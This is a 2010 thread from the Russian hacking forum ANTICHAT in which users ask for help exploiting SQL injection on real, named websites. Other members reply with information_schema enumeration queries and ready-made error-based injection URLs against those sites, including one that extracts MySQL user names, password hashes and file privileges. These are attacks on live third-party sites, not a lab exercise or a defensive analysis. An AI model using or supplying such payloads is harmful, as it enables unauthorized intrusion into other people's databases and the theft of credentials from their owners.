HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15771  
Старый 07.12.2010, 01:30
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от [Ozzi  
"]
[Ozzi] said:
Делаю такой запрос
Код:
Code:
select column_name from information_schema.columns where table_name='User'
мне выдает там 5 значенй логин пароль и тд , делаю дальше так
Код:
Code:
select логин  from User -
меня бросает на главную страницу почему?
причин может быть несколько, мб таблица в другой базе, тогда вопрос будет фелс, и будет редирект

возможно что там фильтр на определенные слова..

а еще много чего возможно,.. анализируй сайт

смотри на какие слова ругается
 
Ответить с цитированием

  #15772  
Старый 07.12.2010, 01:44
[Ozzi]
Guest
Сообщений: n/a
Провел на форуме:
4532

Репутация: -1
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
причин может быть несколько, мб таблица в другой базе, тогда вопрос будет фелс, и будет редирект
возможно что там фильтр на определенные слова..
а еще много чего возможно,.. анализируй сайт
смотри на какие слова ругается
А как мне узнать в той ли базе таблица?
 
Ответить с цитированием

  #15773  
Старый 07.12.2010, 01:45
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от [Ozzi  
"]
[Ozzi] said:
А как мне узнать в той ли базе таблица?
table_schema
 
Ответить с цитированием

  #15774  
Старый 07.12.2010, 01:47
[Ozzi]
Guest
Сообщений: n/a
Провел на форуме:
4532

Репутация: -1
По умолчанию

Цитата:
Сообщение от Gorev  
Gorev said:
table_schema
А пример с использованием можно?)
 
Ответить с цитированием

  #15775  
Старый 07.12.2010, 01:52
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от [Ozzi  
"]
[Ozzi] said:
А пример с использованием можно?)
select table_schema from information_schema.tables where table_name='идем_читать_маны_по_с кулям'
 
Ответить с цитированием

  #15776  
Старый 07.12.2010, 19:34
GroM88
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186

Репутация: 2
Отправить сообщение для GroM88 с помощью ICQ
По умолчанию

http://www.totalbhakti.com/shop.php?cid=2'

Помогите расскурутить чучуть) а то не получается \ =
 
Ответить с цитированием

  #15777  
Старый 07.12.2010, 19:39
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

GroM88

http://www.totalbhakti.com/shop.php?cid=2+or+1+group+by+concat(version(),floo r(rand(0)*2))having+min(0)+or+1--

error based

mysql юзверы (дада,майскул доступен на чтение)

http://www.totalbhakti.com/shop.php?cid=2+and(select+1+from(select+count(*),c oncat((select+(select+(SELECT+concat_ws(0x3a,user, password,file_priv)+from+mysql.user+limit+0,1) )+from+information_schema.tables+limit+0,1),floor( rand(0)*2))x+from information_schema.tables+group+by+x)a)+and+1=1
 
Ответить с цитированием

  #15778  
Старый 07.12.2010, 22:02
GroM88
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186

Репутация: 2
Отправить сообщение для GroM88 с помощью ICQ
По умолчанию

Глупый вопрос) но все же)

Какие запросы использовать в скуле что бы просматривать таблицы из определенной БД?

ну т.е. information_schema.tables выводит все таблицы из всех бд)

а мне надо посмотреть таблицы из определенной бд)
 
Ответить с цитированием

  #15779  
Старый 07.12.2010, 22:13
[Ozzi]
Guest
Сообщений: n/a
Провел на форуме:
4532

Репутация: -1
По умолчанию

Помогите раскрутить)

http://www.grieger-boote.de/product_info.php?products_id=3934'
 
Ответить с цитированием

  #15780  
Старый 07.12.2010, 22:17
Unknown
Guest
Сообщений: n/a
Провел на форуме:
34733

Репутация: 83
По умолчанию

Цитата:
Сообщение от [Ozzi  
"]
[Ozzi] said:
Помогите раскрутить)
http://www.grieger-boote.de/product_info.php?products_id=3934'
http://www.grieger-boote.de/product_info.php?products_id=3934' or 1 group by concat((select version()),floor(rand(0)*2)) having min(0) or 1 -- 1
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ